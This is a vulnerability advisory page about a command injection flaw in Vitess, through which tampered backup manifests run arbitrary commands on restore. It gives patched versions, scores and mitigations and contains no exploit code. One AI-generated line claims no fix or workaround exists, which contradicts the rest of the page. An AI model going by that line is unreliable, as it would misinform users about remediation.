Description
Vitess is a database clustering system for horizontal scaling of MySQL. Prior to versions 23.0.3 and 22.0.4, anyone with read/write access to the backup storage location (e.g. an S3 bucket) can manipulate backup manifest files so that arbitrary code is later executed when that backup is restored. This can be used to provide that attacker with unintended/unauthorized access to the production deployment environment — allowing them to access information available in that environment as well as run any additional arbitrary commands there. Versions 23.0.3 and 22.0.4 contain a patch. Some workarounds are available. Those who intended to use an external decompressor then can always specify that decompressor command in the `--external-decompressor` flag value for `vttablet` and `vtbackup`. That then overrides any value specified in the manifest file. Those who did not intend to use an external decompressor, nor an internal one, can specify a value such as `cat` or `tee` in the `--external-decompressor` flag value for `vttablet` and `vtbackup` to ensure that a harmless command is always used.
Published: 2026-02-26
Score: 8.4 High
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution and Unauthorized Access
Action: Immediate Patch
AI Analysis

Impact

Vitess versions prior to 23.0.3 and 22.0.4 allow an attacker who can read and write to the backup storage location, such as an S3 bucket, to modify backup manifest files; when the backup is restored the program will execute the decompressor command specified in the manifest. This results in arbitrary code execution within the Vitess deployment, giving the attacker unauthorized access to production data and the ability to run any commands. The weakness is a command injection vulnerability (CWE‑78).

Affected Systems

The affected product is Vitess provided by Linux Foundation / VitessIO. All releases from 22.0.0 up to and including 22.0.3, and from 23.0.0 up to and including 23.0.2, are vulnerable. Versions 22.0.4 and 23.0.3 contain the patch that eliminates the flaw.

Risk and Exploitability

The CVSS score of 8.4 marks this flaw as high severity, while the EPSS score of less than 1 percent indicates a low likelihood of exploitation at the time of this report. The vulnerability is not listed in the CISA KEV database, but if an attacker gains write access to the backup storage they can manipulate the manifest and trigger arbitrary code execution when the backup is restored. The attack vector requires the ability to modify backup files and to execute a backup restore in a production environment; no external network access is needed beyond what is normally required to access Vitess and the storage bucket.

Generated by OpenCVE AI on April 18, 2026 at 10:26 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Vitess to version 22.0.4 or 23.0.3, which contain the official patch for the command injection flaw.
  • If an upgrade is not immediately possible, configure the `--external-decompressor` flag for `vttablet` and `vtbackup` to a harmless command such as `cat` or `tee` so that any value provided in the manifest is overridden.
  • Restrict write permissions on the backup storage bucket to only those users that absolutely need them; ensure read‑only or least‑privilege access for all other users.
  • Monitor backup storage access logs for unexpected modifications to manifest files or unusual restore activity.

Generated by OpenCVE AI on April 18, 2026 at 10:26 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-8g8j-r87h-p36x Vitess users with backup storage access can gain unauthorized access to production deployment environments
History

Mon, 02 Mar 2026 18:45:00 +0000

Type Values Removed Values Added
First Time appeared Linuxfoundation
Linuxfoundation vitess
CPEs cpe:2.3:a:linuxfoundation:vitess:*:*:*:*:*:*:*:*
Vendors & Products Linuxfoundation
Linuxfoundation vitess
Metrics cvssV3_1

{'score': 9.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}

Thu, 26 Feb 2026 13:30:00 +0000

Type Values Removed Values Added
First Time appeared Vitessio
Vitessio vitess
Vendors & Products Vitessio
Vitessio vitess

Thu, 26 Feb 2026 02:15:00 +0000

Type Values Removed Values Added
Description Vitess is a database clustering system for horizontal scaling of MySQL. Prior to versions 23.0.3 and 22.0.4, anyone with read/write access to the backup storage location (e.g. an S3 bucket) can manipulate backup manifest files so that arbitrary code is later executed when that backup is restored. This can be used to provide that attacker with unintended/unauthorized access to the production deployment environment — allowing them to access information available in that environment as well as run any additional arbitrary commands there. Versions 23.0.3 and 22.0.4 contain a patch. Some workarounds are available. Those who intended to use an external decompressor then can always specify that decompressor command in the `--external-decompressor` flag value for `vttablet` and `vtbackup`. That then overrides any value specified in the manifest file. Those who did not intend to use an external decompressor, nor an internal one, can specify a value such as `cat` or `tee` in the `--external-decompressor` flag value for `vttablet` and `vtbackup` to ensure that a harmless command is always used.
Title Vitess users with backup storage access can gain unauthorized access to production deployment environments
Weaknesses CWE-78
References
Metrics cvssV4_0

{'score': 8.4, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:L'}

Subscriptions

Linuxfoundation Vitess
Vitessio Vitess
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T19:32:59.874Z

Reserved: 2026-02-25T03:24:57.793Z

Link: CVE-2026-27965

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Analyzed

Published: 2026-02-26T02:16:23.647

Modified: 2026-03-02T18:36:24.300

Link: CVE-2026-27965

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T10:30:35Z

Weaknesses